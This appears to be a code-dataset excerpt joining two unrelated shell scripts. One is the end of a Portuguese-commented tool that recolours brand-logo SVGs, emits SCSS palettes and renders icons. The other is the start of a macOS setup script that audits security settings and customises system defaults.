echo "<h1 style=\"background-color:#$u1;\">$u1</h1>"
done
}
simchange()
{
arraypalette;similarsvgcolor $1;rm -f grep$$
n=0
for u in $rs
do u1=`echo $u|cut -d":" -f1`
u2=`echo $u|cut -d":" -f2|cut -c1-6`
echo "s%fill:#$u1%fill:#$u2%g" >>sed$$
n=`expr $n + 1`
done
if [ $n -gt 0 ]
then echo "$n altercoes de cor"
bn=`basename $1`
sed -f sed$$ $1 >$i/z$$-$bn
cp $1 $i/s`date "+%Y%m%d%H%M%S"`-$bn
mv $i/z$$-$bn $1
else echo "$n similar colors"
fi
echo "`echo $rn|wc -w` unmatched colors"
rm -f sed$$
}
# Restore the most recent backup of the given svg from $i (the svg/ dir),
# where backups are named s<timestamp>-<basename>; the newest timestamp
# wins, and the backup file is removed after being copied back.
simback()
{
bn=`basename $1`
# Strip "dir/" and the leading "s", then sort timestamps numerically.
u=`ls $i/s[0-9][0-9]*-$bn|cut -d"/" -f2|cut -c2-|sort -nr|head -1`
if [ -n "$u" ]
then echo "Recuprar $i/s$u para $1"
cp $i/s$u $1
rm $i/s$u
else echo "Nao existe recuperacao para $1 em $i"
fi
}
valcor()
{
# Validate a requested color change (original comments in Portuguese:
# "valida pedidos de alteracao de cores").
# $1 = requested color ("#rrggbb")
# $2 = current color on file
# $3 = descriptive label used in error messages
if [ "$1" != "$2" ];then
ta=1 # color was changed (global flag read elsewhere in the script)
# A valid value must be exactly 7 chars: "#" plus six hex digits.
if [ `echo -n "$1"|wc -m` -ne 7 ];then
echo "$3 invalida tamanho<>7 $1"
exit 1
else
# Round-trip through ruby's color gem; if the normalized HTML form
# differs from the input, the value was not a clean #rrggbb color.
rt="puts Color::RGB.from_html('$1')"
vh=`ruby -r color -e "$rt.html"`
if [ `echo -n "$vh"|wc -m` -ne 7 -o $vh != $1 ];then
echo "$3 invalida SET=$1 RGB=$vh"
exit 1
fi
fi
fi
}
valpal()
{
# Validate the user-overridable palette entries, then derive the
# computed schema colors. (Original comment in Portuguese.)
# validar other colors aco[01-02,05,06-08]
n=0
n=`expr $n + 1`;valcor ${aco[$n]} ${vco[$n]} ${dco[$n]}
n=`expr $n + 1`;valcor ${aco[$n]} ${vco[$n]} ${dco[$n]}
n=`expr $n + 3`;valcor $c_fenix ${vco[$n]} ${dco[$n]}
# Recompute the derived schema colors from the validated bases
# ("Obter schema cores calculadas").
setschemafenixs
setschema
}
usage()
{
cat << EO
Cria fenix brand logos & images
EO
cat <<EO | column -s\& -t
-h & show this output
-f & show current fill colors for all svgs
-s & show current stroke colors for all svgs
-p & show internal palette
-r & show similarity report
-q & show frontend-variables-skeleton.scss
-e & show frontend-variables-bootstrap.scss
-d & show frontend-fenix-skeleton.scss
-n & show backend.variables.scss
-a & show backend.fenix.scss
-opt & [IMPORTANTE] optimize svgs - deve ser feito antes novos svgs
-o des:ori & show color des values obtained from color ori
-l limit & set limit for similarity (default $m)
-c svg & change similar colors
-m svg & show matched color list (html format)
-t svg & show matched color list (script format)
-u svg & show unmatched color list
-b svg & go back to last change similarity colors
-f1-3 svg & change brand base svgs
-l1-2 svg & change brand compositions svgs
-i1 svg & change brand svg for cesto compras
EO
}
showcolors()
{
# mostra cores actualmente nos svgs
echo
echo "Current colors in $b"
for f in `ls $b`
do ac=`grep -i "$1:#" $b/$f|sed -e "s%.*$1:#\(......\).*%\1%g"|sort -u`
if [ -n "$ac" ];then echo $f $ac;fi
done
echo
echo "Current colors in $c"
for f in `ls $c`
do ac=`grep -i "$1:#" $c/$f|sed -e "s%.*$1:#\(......\).*%\1%g"|sort -u`
if [ -n "$ac" ];then echo $f $ac;fi
done
}
showpalette()
{
valpal
n=1
while [ $n -le $j ]
do a="<h1 style=\"background-color:${vco[$n]};\">"
echo "$a`printf '%03d' $n`-a${aco[$n]}:v${vco[$n]}:${dco[$n]}</h1>"
if [ "${aco[$n]}" != "${vco[$n]}" ]
then getschema "${vco[$n]}" "#`echo ${dco[$n]}|cut -d":" -f1`"
fi
n=`expr $n + 1`
done
}
frontend-variables-skeleton()
{
valpal
# Para calcular rgb decimais
#r5=`echo ${vco[5]}|cut -c2-3|tr '[:lower:]' '[:upper:]'`
#g5=`echo ${vco[5]}|cut -c4-5|tr '[:lower:]' '[:upper:]'`
#b5=`echo ${vco[5]}|cut -c6-7|tr '[:lower:]' '[:upper:]'`
#dr5=`echo "ibase=16; $r5"|bc`
#dg5=`echo "ibase=16; $g5"|bc`
#db5=`echo "ibase=16; $b5"|bc`
cat << EOF
\$c_green: ${vco[5]};
\$c_red: ${vco[12]};
\$layout_background_color: lighten(\$c_green, 80);
\$title_text_color: ${vco[7]};
\$body_text_color: ${vco[1]};
\$link_text_color: \$c_green;
\$product_background_color: ${vco[2]};
\$product_title_text_color: ${vco[6]};
\$product_body_text_color: ${vco[1]};
\$product_link_text_color: \$c_green;
\$border_color: lighten(\$body_text_color, 60);
\$default_border: 1px solid \$border_color;
\$button_border_color: \$link_text_color;
\$table_head_color: lighten(\$body_text_color, 60);
EOF
}
frontend-variables-bootstrap()
{
valpal
cat << EOF
\$brand-primary: ${vco[5]};
\$brand-success: ${vco[5]};
\$brand-info: ${vco[7]};
\$brand-warning: ${vco[10]};
\$brand-danger: ${vco[12]};
\$brand-red3: ${vco[3]};
\$btn-default-bg: ${vco[5]};
\$btn-default-color: ${vco[1]};
\$btn-default-border: \$btn-default-bg;
\$btn-primary-border: \$brand-primary;
\$btn-success-border: \$brand-success;
\$btn-info-border: \$brand-info;
\$btn-warning-border: \$brand-warning;
\$btn-danger-border: \$brand-danger;
\$border-radius-base: 2px;
\$border-radius-large: 4px;
\$border-radius-small: 1px;
\$font-family-sans-serif: "Ubuntu", sans-serif;
\$font-family-serif: "Ubuntu", serif;
\$font-family-monospace: "Ubuntu Mono", monospace;
@import "bootstrap-sprockets";
@import "bootstrap";
@mixin fenix-button-variant(\$cor) {
&:hover,
&:focus,
&:active,
&.active,
.open > &.dropdown-toggle {
background-color: \$cor;
border-color: \$cor;
}
.badge {
background-color: \$cor;
}
}
.btn-default {
@include fenix-button-variant(\$brand-red3);
}
.btn-primary {
@include fenix-button-variant(\$brand-red3);
}
.btn-success {
@include fenix-button-variant(\$brand-red3);
}
EOF
}
frontend-fenix-skeleton()
{
valpal
cat << EOF
input[type="submit"], input[type="button"],
input[type= "reset"], button, a.button {
border: none;
padding: 6px 10px 6px;
vertical-align: center;
-webkit-border-radius: 2px;
-khtml-border-radius: 2px;
-moz-border-radius: 2px;
-ms-border-radius: 2px;
-o-border-radius: 2px;
border-radius: 2px;
&:hover {
background-color: ${vco[3]};
}
}
a {
&:hover {
color: ${vco[3]};
}
}
nav #main-nav-bar {
li {
&#link-to-cart {
a {
&:hover {
color: ${vco[3]};
}
}
}
}
}
EOF
}
backend-variables()
{
valpal
cat << EOF
\$color-1: ${vco[2]}; // c2-white
\$color-2: ${vco[6]}; // c6
\$color-3: ${vco[3]}; // c3-red3
\$color-4: ${vco[5]}; // c5-base
\$color-5: ${vco[4]}; // c4-red4
\$color-6: ${vco[7]}; // c7-info
// Body base colors
\$color-body-bg: \$color-1;
\$color-body-text: ${vco[1]}; // c1-cinza
\$color-headers: \$color-6;
\$color-link: \$color-4;
\$color-link-hover: \$color-3;
\$color-link-active: \$color-4;
\$color-link-focus: \$color-4;
\$color-link-visited: \$color-3;
\$color-border: very-light(\$color-4, 12);
// Basic flash colors
\$color-success: ${vco[11]};
\$color-notice: ${vco[10]};
\$color-error: ${vco[12]};
// Table colors
\$color-tbl-odd: \$color-1;
\$color-tbl-even: very-light(\$color-4, 4);
\$color-tbl-thead: very-light(\$color-4, 4);
// Button colors
\$color-btn-bg: \$color-4;
\$color-btn-text: \$color-1;
\$color-btn-hover-bg: \$color-3;
\$color-btn-hover-text: \$color-1;
// Select2 select field colors
\$color-sel-bg: \$color-4;
\$color-sel-text: \$color-body-text;
\$color-sel-hover-bg: \$color-3;
\$color-sel-hover-text: \$color-body-text;
// Text inputs colors
\$color-txt-brd: lighten(\$color-body-text, 60);
\$color-txt-text: \$color-body-text;
\$color-txt-hover-brd: \$color-4;
EOF
}
backend-fenix()
{
# Emit the Fenix-specific backend SCSS overrides (admin menu / sub-menu
# colours) on stdout, using the validated vco[] palette indirectly via
# the \$color-* variables produced by backend-variables.
valpal
cat << EOF
// Fenix some color changes
#admin-menu {
background-color: \$color-4;
li {
a {
color: \$color-1 !important;
&:hover {
background-color: \$color-3;
&:after {
border-top: 5px solid \$color-3;
}
}
}
.dropdown {
background-color: \$color-3;
}
&.selected a {
@extend a:hover;
}
}
}
#sub-menu {
background-color: lighten(\$color-4, 10);
li {
a {
color: \$color-1 !important;
}
&.selected a, a:hover {
background-color: \$color-3;
&:after {
border-top: 5px solid \$color-3;
}
}
}
}
EOF
}
# troca de cores nos svgs: proccolors ${aco[$n]} ${vco[$n]} ${dco[$n]}
# $1 = new colour (#rrggbb), $2 = current colour, $3 = colour label.
# Rewrites fill:$2 -> fill:$1 in every SVG under $b and $c that still uses
# the old colour, archiving each original file in $i and counting rewrites
# in the global $fc.  Reads the globals $b, $c, $i, $lb, $lc (colour lists
# per directory) and writes $fc.
proccolors()
{
 # nothing to do when the colour is unchanged or absent from both dirs
 if [ "$1" != "$2" ] && [ -n "`echo $lb $lc|grep -i "$2"`" ];then
  _proccolors_dir "$b" "$lb" "$1" "$2" "$3"
  _proccolors_dir "$c" "$lc" "$1" "$2" "$3"
 fi
}

# Apply one colour substitution to every *.svg inside a single directory.
# $1=dir $2=colour list for that dir $3=new colour $4=old colour $5=label
_proccolors_dir()
{
 local dir=$1 have=$2 new=$3 old=$4 label=$5 f lf
 if [ -n "`echo $have|grep -i "$old"`" ] && [ -z "`echo $have|grep -i "$new"`" ];then
  echo "processar $dir/*.svg for $label=$old CHANGED to $new"
  for f in `ls "$dir"`
  do lf=`grep -i fill:# "$dir/$f"|sed -e 's%.*fill:\(#......\).*%\1%g'|sort -u`
   if [ -n "`echo $lf|grep -i "$old"`" ] && [ -z "`echo $lf|grep -i "$new"`" ];then
    # rewrite into a temp file, archive the original in $i, then move the
    # rewritten copy into place and count the change
    echo "$dir/$f ALTERADO";fc=$((fc + 1))
    sed -e "s%fill:$old%fill:$new%g" "$dir/$f" >"$dir/z$f";mv "$dir/$f" "$i";mv "$dir/z$f" "$dir/$f"
   elif [ -n "`echo $lf|grep -i "$new"`" ];then
    echo "$dir/$f NAOALTERADO alredy has $new"
   fi
  done
 elif [ -n "`echo $have|grep -i "$new"`" ];then
  echo "$dir/*.svg nao processados for $label alredy have $new"
 fi
}
# default logos & compositions
f1=qa # fenix.3red
f2=qd # logo-dark.2reds
f3=qc # fenix.5cor
f4=qe # fat-logo-dark.2reds
l1=ca # logo-light-red-byfenixdecorare
l2=cb # logo-light-bw-byfenixdecorare
l3=cc # logo-dark-black-tagline
i1=ea # cesto-compras
# operation dirs
b=base
i=svg
o=png
c=comp
t=tmp
v=jpg
# obter cores actuais nos svgs para processar alteracao
# aco[03-09] calculadas a partir de c_fenix
# aco[13] calculadas a partir de vco[1] sinza
currentsvgcolors
c_fenix=${vco[5]}
aco[1]=${vco[1]}
aco[2]=${vco[2]}
aco[10]=${vco[10]}
aco[11]=${vco[11]}
aco[12]=${vco[12]}
# teste pedidos alteracao de cor
ta=0
as=adjust_saturation
ab=adjust_brightness
# valor max em que uma cor e considereda similar
m="0.1"
# Command-line definition: short options plus the grouped long options
# assembled into $LOPTS for GNU getopt below.
SOPTS="hfsprqednao:l:c:m:t:u:b:"
LOPT1="f1:,f2:,f3:"
LOPT2="l1:,l2:"
LOPT3="i1:"
LOPTS="opt,$LOPT1,$LOPT2,$LOPT3"
ARGS=$(getopt -a -o $SOPTS -l $LOPTS --name $PROGNAME -- "$@")
eval set -- "$ARGS"
# Most flags run a single report/generation action and exit immediately;
# only -l and the --f*/--l*/--i1 overrides fall through to the pipeline.
while true; do
case $1 in
-h) usage ; exit 0;;
-f) showcolors fill ; exit 0;;
-s) showcolors stroke ; exit 0;;
-p) showpalette ; exit 0;;
-r) simreport ; exit 0;;
-q) frontend-variables-skeleton ; exit 0;;
-e) frontend-variables-bootstrap; exit 0;;
-d) frontend-fenix-skeleton ; exit 0;;
-n) backend-variables ; exit 0;;
-a) backend-fenix ; exit 0;;
-o) showcoldest $2 ; exit 0;;
-l) m=$2 ; shift;;
-c) simchange $2 ; exit 0;;
-m) matchedlist $2 ; exit 0;;
-t) matchscript $2 ; exit 0;;
-u) unmatchedlist $2 ; exit 0;;
-b) simback $2 ; exit 0;;
--opt) optsvgs ; exit 0;;
--f1) f1=$2; shift;;
--f2) f2=$2; shift;;
--f3) f3=$2; shift;;
--l1) l1=$2; shift;;
--l2) l2=$2; shift;;
--i1) i1=$2; shift;;
--) shift; break;;
*) shift; break;;
esac
shift
done
# validar pelette cores
valpal
# valcor verificou validade e pedidos de alteracao de cores
# se houve pedido de alteraco de cores os svg sao processados
if [ $ta -eq 1 ]
then
# listas globais nos svg base, comp
lb=`grep -i fill:# $b/*.svg|sed -e 's%.*fill:\(#......\).*%\1%g'|sort -u`
lc=`grep -i fill:# $c/*.svg|sed -e 's%.*fill:\(#......\).*%\1%g'|sort -u`
# processamento de cores novas nos svgs
fc=0
n=1
# NOTE(review): $j (palette size) is set outside this excerpt, presumably
# by currentsvgcolors/valpal -- confirm it is defined before this loop.
while [ $n -le $j ]
do proccolors ${aco[$n]} ${vco[$n]} ${dco[$n]};n=`expr $n + 1`
done
if [ $fc -gt 0 ]
then echo "[IMPORTANTE] Altere variaveis em currentsvgcolors com cores alteradas"
else echo "Foi pedida uma alteracao de schema de cores mas nenhuma alteracao foi necessaria"
fi
fi
#Usada para conversao -> png & jpg optimizadas
cpng="-strip -quality 75% -sampling-factor 4:2:0"
cjpg="-background white -flatten -interlace Line $cpng"
echo "Basic color palette for fenix"
r1="puts Color::RGB.from_html('$c_fenix')"
echo "`ruby -r color -e \"$r1.css_hsl\"`;`ruby -r color -e \"$r1.css_rgb\"`"
# para apple devices apple-touch-icon.png,icon_128.gif,favicon.ico
# Rasterise the logo SVGs at every icon size needed downstream.
rsvg-convert -h 16 -a -f png $b/$f4.svg -o $t/$f4-0016.png
rsvg-convert -h 32 -a -f png $b/$f4.svg -o $t/$f4-0032.png
rsvg-convert -h 48 -a -f png $b/$f2.svg -o $t/$f2-0048.png
rsvg-convert -h 64 -a -f png $b/$f2.svg -o $t/$f2-0064.png
rsvg-convert -h 75 -a -f png $b/$f2.svg -o $t/$f2-0075.png # facebook app
rsvg-convert -h 120 -a -f png $b/$f2.svg -o $t/$f2-0120.png # google OAuth
rsvg-convert -h 128 -a -f png $b/$f2.svg -o $t/$f2-0128.png
rsvg-convert -h 180 -a -f png $b/$f2.svg -o $t/$f2-0180.png # facebook profile needs this
rsvg-convert -h 256 -a -f png $b/$f2.svg -o $t/$f2-0256.png
rsvg-convert -h 600 -a -f png $b/$f1.svg -o $t/$f1-0600.png # foto id da fenix decorare
rsvg-convert -h 1024 -a -f png $b/$f2.svg -o $t/$f2-1024.png
#Usada para conversao -> png optimizadas
convert $cpng $t/$f4-0016.png $o/$f4-0016.png
convert $cpng $t/$f4-0032.png $o/$f4-0032.png
convert $cpng $t/$f2-0048.png $o/$f2-0048.png
convert $cpng $t/$f2-0064.png $o/$f2-0064.png
convert $cpng $t/$f2-0075.png $o/$f2-0075.png
convert $cpng $t/$f2-0120.png $o/$f2-0120.png
convert $cpng $t/$f2-0128.png $o/$f2-0128.png
convert $cpng $t/$f2-0180.png $o/$f2-0180.png
convert $cpng $t/$f2-0256.png $o/$f2-0256.png
convert $cpng $t/$f1-0600.png $o/$f1-0600.png
convert $cpng $t/$f2-1024.png $o/$f2-1024.png
convert -background ${aco[5]} $b/qb.svg $cpng -thumbnail 152x152 $o/apple-touch-icon.png
convert -background none -bordercolor none $b/$f2.svg $cpng -thumbnail 200x200 -border 50x50 $o/$f2-gpp.png
convert -background none -bordercolor none $b/$f1.svg $cpng -thumbnail 500x500 -border 50x50 $o/$f1-fid.png
convert -background none $b/$f2.svg -thumbnail 128x128 $o/icon_128.gif
convert $o/$f4-0016.png $o/$f4-0032.png \
 $o/favicon.ico
# Logos redes sociais x32
rsvg-convert -h 24 -a -f svg $c/sf.svg|svgo -i - -o $i/sf.svg
rsvg-convert -h 24 -a -f svg $c/sg.svg|svgo -i - -o $i/sg.svg
rsvg-convert -h 24 -a -f svg $c/sl.svg|svgo -i - -o $i/sl.svg
rsvg-convert -h 24 -a -f svg $c/st.svg|svgo -i - -o $i/st.svg
rsvg-convert -h 24 -a -f svg $c/sy.svg|svgo -i - -o $i/sy.svg
gzip -cfq9 $i/sf.svg > $i/sf.svgz
gzip -cfq9 $i/sg.svg > $i/sg.svgz
gzip -cfq9 $i/sl.svg > $i/sl.svgz
gzip -cfq9 $i/st.svg > $i/st.svgz
gzip -cfq9 $i/sy.svg > $i/sy.svgz
# Composicoes loja used by spree 176x82
rsvg-convert -h 82 -a -f png $c/$l3.svg -o $o/logo-loja-casadosquadros.png
rsvg-convert -h 40 -a -f png $c/$l3.svg -o $o/logo-loja-casadosquadros-admin.png
convert $cjpg $o/logo-loja-casadosquadros.png $v/logo-loja-casadosquadros.jpg
convert $cjpg $o/logo-loja-casadosquadros-admin.png $v/logo-loja-casadosquadros-admin.jpg
# Criar versao svg optimizada para frontend
# svgz precisa content-encoding http header set gzip in aws
rsvg-convert -h 82 -a -f svg $c/$l3.svg|svgo -i - -o $i/logo-loja-casadosquadros.svg
gzip -cfq9 $i/logo-loja-casadosquadros.svg > $i/logo-loja-casadosquadros.svgz
# Composicao google-api-logo max120x60
#rsvg-convert -w 119 -a -f png $c/$l3.svg -o $o/$l3-ga.png
# Composicoes loja used by spree noimage
# Build the "no image" placeholder thumbnails (product/large/small/mini) by
# blending the logo at 25% over rendered "imagem"/"não existe" captions.
clet=${aco[5]}
rsvg-convert -a -h 240 -f png $b/$f2.svg -o $t/$f1-pr.png
./preplet.sh imagem la t240 h120 $clet
./preplet.sh "não existe" la t240 h120 $clet
convert $o/panão_existe.png $o/paimagem.png \
-gravity center -append $t/pr.png
composite $cpng -dissolve 25% -gravity center \
$t/$f1-pr.png $t/pr.png $o/product.png
composite $cpng -dissolve 25% -gravity center \
$t/$f1-pr.png $t/pr.png $o/large.png
convert $cjpg $o/product.png $v/product.jpg
convert $cjpg $o/large.png $v/large.jpg
rsvg-convert -a -h 100 -f png $b/$f2.svg -o $t/$f1-pr.png
./preplet.sh imagem la t100 h50 $clet
./preplet.sh "não existe" la t100 h50 $clet
convert $o/panão_existe.png $o/paimagem.png \
-gravity center -append $t/pr.png
composite $cpng -dissolve 25% -gravity center \
$t/$f1-pr.png $t/pr.png $o/small.png
convert $cjpg $o/small.png $v/small.jpg
rsvg-convert -a -h 48 -f png $b/$f2.svg -o $t/$f1-pr.png
./preplet.sh imagem la t48 h24 $clet
./preplet.sh "não existe" la t48 h24 $clet
convert $o/panão_existe.png $o/paimagem.png \
-gravity center -append $t/pr.png
composite $cpng -dissolve 25% -gravity center \
$t/$f1-pr.png $t/pr.png $o/mini.png
convert $cjpg $o/mini.png $v/mini.jpg
rm $o/paimagem.png $o/panão_existe.png
# Composição access report x400
rsvg-convert -h 400 -a -f png $c/$l2.svg -o $o/$l2-go.png
convert $o/$l2-go.png -background white -flatten $v/$l2-go.jpg
rm $o/$l2-go.png
exit
# NOTE(review): everything below this `exit` is dead code kept for
# reference (older social-media composition recipes); it never runs.
# Composição google+,paginas, min(480x270)
rsvg-convert -w 480 -h 270 -f png $c/$l1.svg -o $o/$l1-gpp.png
# Composição google Enterprise 143x59
rsvg-convert -f png $c/$l1.svg -o $o/$l1-ge.png
# Composicoes facebook
# capa-min720x
# banners f1=155x100 f2=800x150 opcionais f2=180x115 f4=394x150
rsvg-convert -w 722 -a -f png $c/$l1.svg -o $o/$l1-fb.png
# Composicao twitter capa-1252x626 fundo-1000
rsvg-convert -w 1252 -h 626 -f png $c/$l1.svg -o $o/$l1-tw.png
rsvg-convert -w 1000 -a -f png $b/$t1.svg -o $o/$t1-tw.png
# Composicao flickr-api-logo 300x90 max600x300
convert -background none $c/$l2.svg -thumbnail 396x90 $o/$l2-fl.gif
# Composicao youtube channel
#tv 2120x1192
#desktop 2120x350
#tablet 1536x350
#mobile 1280x350
rsvg-convert -f png $c/$l3.svg -o $t/$l3-yt.png
convert $t/$l3-yt.png -background white -flatten $v/$l3-yt.jpg
# Composicao logo comunidade navbar tem x50
# com estes -h da x46 em ambos png,svg
rsvg-convert -a -h 46 -f png $c/$l1.svg -o $o/cfpt-logo.png
rsvg-convert -a -h 37 -f svg $c/$l1.svg -o $t/cfpt-logo.svg
./css.rb $t/cfpt-logo.svg > $i/cfpt-logo.svg
# Composicao blog x200
#rsvg-convert -h 200 -a -f png $c/$l2.svg -o $t/$l2-bl.png
#convert $t/$l2-bl.png -background white -flatten $v/bg1.jpg
# Composicao botoes doar fenix 80x64, paypal 73x26
rsvg-convert -f png $c/$l4.svg -o $o/$l4-doar.png
rsvg-convert -f png $c/$l5.svg -o $o/$l5-doar.png
| true |
64ea4f3600ee92619a61f059b7647826b875c211 | Shell | ergo-dubito/dotfiles-6 | /coffee.sh | UTF-8 | 15,682 | 3.765625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
#coffee.sh
#THINGS TO ADD:
# - install applications function instead of repeated code in each function
# - potentially add .files to be installed
# - add function to verify signature of applications before install
# - checksum function for applications that have checksums online, again
# instead of being repeated in functions
#Inspired from 0xmachos bittersweet.sh
#Tested on macOS 10.13, 10.14 beta w/ MacBook Pro 2016
set -euo pipefail
# -e if any command returns a non-zero status code, exit
# -u don't use undefined vars
# -o pipefall pipelines fails on the first non-zero status code
#Set colours for easy spotting of errors
FAIL=$(echo -en '\033[0;31m')
PASS=$(echo -en '\033[0;32m')
NC=$(echo -en '\033[0m')
WARN=$(echo -en '\033[0;33m')
INFO=$(echo -en '\033[0;35m')
function usage {
  # Print the command summary to stdout and exit.
  # NOTE(review): always exits 0, even when reached via an unknown command
  # from main() -- confirm a non-zero status isn't wanted for that case.
  cat << EOF
Usage:
  audit       - Audit macOS security ⛑
  customise   - Customise the default options of macOS 😍
  bailiff     - Install Bailiff ☁️
  gpgtools    - Install GPG Tools ⚙️
  sublime     - Install Sublime Text 👨💻
  tower       - Install Tower 💂♂️
  xcode       - Install Xcode
  brew        - Install Homebrew 🍺
  dotfiles    - Install dotfiles 🔑
  all         - Install the items listed above ❤️
EOF
  exit 0
}
function cleanup {
  #Unmounting and deleting any installers that were mounted or downloaded
  # $1 - downloaded .dmg/.zip (or copied .app) to delete
  # $2 - .zip to delete, or mounted volume to detach
  # NOTE(review): both parameters are mandatory (the :? expansions abort the
  # whole script when missing), yet main() calls plain `cleanup` with no
  # arguments as its last step -- that call can only abort; confirm intent.
  echo "${INFO}|||${NC} Starting Cleanup"
  local download_dmg
  local installer
  download_dmg=${1:?download_dmg not passed to cleanup}
  installer=${2:?installer not passed to cleanup}
  echo "${INFO}|||${NC} Deleting ${download_dmg}"
  rm -r "${download_dmg}"
  if [ -f "${installer}" ] ; then
    # a .zip "installer" is simply deleted ...
    if echo "${installer}" | grep ".zip" ; then
      echo "${INFO}|||${NC} Deleting ${installer}"
      rm -rf "${installer}"
    else
      # ... anything else is assumed to be a mounted disk image
      echo "${INFO}|||${NC} Unmounting from ${installer}"
      hdiutil detach -quiet "${installer}"
    fi
  fi
}
function check_sudo_permission {
  # Status 0 when we are NOT running as root (so sudo may prompt for a
  # password); status 1 when already root.
  [ "$EUID" -ne 0 ]
}
function check_firewall {
  # Status 0 when the macOS application firewall is enabled
  # (globalstate >= 1; 2 means the stricter "essential services" mode).
  firewall="$(defaults read /Library/Preferences/com.apple.alf globalstate)"
  [[ "${firewall}" -ge 1 ]]
}
function check_stealth_firewall {
  # Status 0 when the firewall's stealth mode flag is exactly 1.
  stealth="$(defaults read /Library/Preferences/com.apple.alf stealthenabled)"
  [[ "${stealth}" -eq 1 ]]
}
function check_filevault {
  # Status 0 when `fdesetup status` reports FileVault is turned On.
  fdesetup status | grep "On" > /dev/null
}
function check_efi {
  #https://eclecticlight.co/2018/06/02/how-high-sierra-checks-your-efi-firmware/
  # Status 0 when eficheck's EFI firmware integrity check succeeds.
  /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check > /dev/null
}
function check_firmware_pwd {
  # Status 0 when a firmware password is set (needs sudo to query).
  sudo firmwarepasswd -check | grep -q 'Yes'
}
function check_sip {
  # Status 0 when System Integrity Protection reports "enabled".
  csrutil status | grep -q 'enabled'
}
function audit_macOS {
  #TODO: Check GateKeeper enabled
  # Run every security check and report which passed and which failed.
  # BUGFIX: the result arrays are now initialised empty and expanded with
  # the ${arr[@]+...} idiom; with the script's `set -u`, expanding an empty
  # array as "${arr[@]}" aborts on bash < 4.4 (macOS ships bash 3.2), which
  # crashed the audit whenever every check passed or every check failed.
  echo "${INFO}|||${NC} Auditing macOS..."
  if check_sudo_permission ; then
    echo "${WARN}|||${NC} Password may be required..."
  fi
  local AUDIT_PASS=()
  local AUDIT_FAIL=()
  audit_functions=( check_filevault check_efi check_firmware_pwd check_sip check_firewall check_stealth_firewall)
  for f in "${audit_functions[@]}" ; do
    if "${f}" ; then
      AUDIT_PASS+=("${f}")
    else
      AUDIT_FAIL+=("${f}")
    fi
  done
  echo "${PASS}|||${NC} Functions that passed audit: "
  for f in ${AUDIT_PASS[@]+"${AUDIT_PASS[@]}"} ; do
    echo "    ${f}"
  done
  if [[ "${#AUDIT_PASS[@]}" == "${#audit_functions[@]}" ]] ; then
    echo "${PASS}|||${NC} Hooray! Everything passed 🎉"
    exit 0
  else
    echo "${FAIL}|||${NC} Functions that failed audit: "
    for g in ${AUDIT_FAIL[@]+"${AUDIT_FAIL[@]}"} ; do
      echo "${g}"
    done
  fi
  exit 0
}
function customise_defaults {
  # Apply this machine's preferred macOS defaults (firewall, Finder,
  # screenshots, hot corners, ...).  Each write is preceded by a comment
  # showing the stock value it replaces.
  echo "${INFO}|||${NC} Customising the defaults..."
  #Disable Guest User
  #default: sudo defaults write /Library/Preferences/com.apple.AppleFileServer guestAccess -bool true
  sudo defaults write /Library/Preferences/com.apple.AppleFileServer guestAccess -bool false
  #Enable Firewall
  #default: sudo defaults write /Library/Preferences/com.apple.alf globalstate -bool false
  sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 1
  #NOTE: Can set -int 2 for stricter firewall that will only allow essential services such as DHCP
  #TODO: Enable account name in tool bar
  #Enable Secure Keyboard Entry
  #default: defaults write com.apple.Terminal SecureKeyboardEntry -bool false
  defaults write com.apple.Terminal SecureKeyboardEntry -bool true
  #TODO: Enable unlock with Apple Watch (maybe)
  #Show battery percentage
  #default: defaults write com.apple.menubar.battery ShowPercent NO
  defaults write com.apple.menuextra.battery ShowPercent -string "YES"
  #TODO: Set Flip Clock screensaver
  #Enable Plain Text Mode in TextEdit by Default
  #default: defaults write com.apple.TextEdit RichText -int 1
  defaults write com.apple.TextEdit RichText -int 0
  #Save panel Expanded View by default
  #default: defaults write -g NSNavPanelExpandedStateForSaveMode -bool false
  # defaults write -g NSNavPanelExpandedStateForSaveMode -bool false
  defaults write -g NSNavPanelExpandedStateForSaveMode -bool true
  defaults write -g NSNavPanelExpandedStateForSaveMode2 -bool true
  #Print panel Expanded View by default
  #default: defaults write -g PMPrintingExpandedStateForPrint -bool false
  # defaults write -g PMPrintingExpandedStateForPrint2 -bool false
  defaults write -g PMPrintingExpandedStateForPrint -bool true
  defaults write -g PMPrintingExpandedStateForPrint2 -bool true
  #WORK IN PROGRESS --------------
  #'set dark mode to false' to set to light mode
  osascript << EOF
tell application "System Events"
	tell appearance preferences
		set dark mode to true
	end tell
end tell
EOF
  #Show all hidden files in Finder
  #default: defaults write com.apple.Finder AppleShowAllFiles -bool false
  #BUGFIX: was misspelled "defautls", so this setting was never applied
  defaults write com.apple.Finder AppleShowAllFiles -bool true
  #Save Screenshots in PNG
  #default: defaults write com.apple.screencapture type -string "png"
  #BUGFIX: the key name "type" was missing, which made `defaults write` fail
  defaults write com.apple.screencapture type -string "png"
  #Require password immediately after sleep or screen saver starting
  defaults write com.apple.screensaver askForPassword -int 1
  defaults write com.apple.screensaver askForPasswordDelay -int 0
  #Show icons for removable media on Desktop
  #default: defaults write com.apple.finder ShowMountedServersOnDesktop -bool false \
  #         defaults write com.apple.finder ShowRemovableMediaOnDesktop -bool false
  defaults write com.apple.finder ShowMountedServersOnDesktop -bool true
  defaults write com.apple.finder ShowRemovableMediaOnDesktop -bool true
  #Windows-style sorting: keep folder on top
  #default: defaults write com.apple.finder _FXSortFoldersFirst -bool false
  defaults write com.apple.finder _FXSortFoldersFirst -bool true
  #Finder: Search current folder first by default
  #default: defaults write com.apple.finder FXDefaultSearchScope -string "????"
  defaults write com.apple.finder FXDefaultSearchScope -string "SCcf"
  #Hot Corners 🤙
  #Bottom-left - Mission Control
  defaults write com.apple.dock wvous-bl-corner -int 2
  defaults write com.apple.dock wvous-bl-modifier -int 0
  #Bottom-right - Show Desktop
  defaults write com.apple.dock wvous-br-corner -int 4
  defaults write com.apple.dock wvous-br-modifier -int 0
  #App Store: Check for updates daily
  #default: defaults write com.apple.SoftwareUpdate ScheduleFrequency -int 7
  defaults write com.apple.SoftwareUpdate ScheduleFrequency -int 1
  #NOTE: REMOVE "Show all hidden files/folder" and change it to
  #      Show Desktop, .ssh, Documents in Users folder instead ❤️
  exit 0
}
function install_bailiff {
  # Placeholder: Bailiff installation is not implemented yet.
  printf '%s\n' "${INFO}|||${NC} Installing Bailiff..."
  exit 0
}
function install_gpg {
  # Download the current GPG Suite .dmg, verify it against the SHA256 hash
  # published on gpgtools.org, mount it and run the installer package.
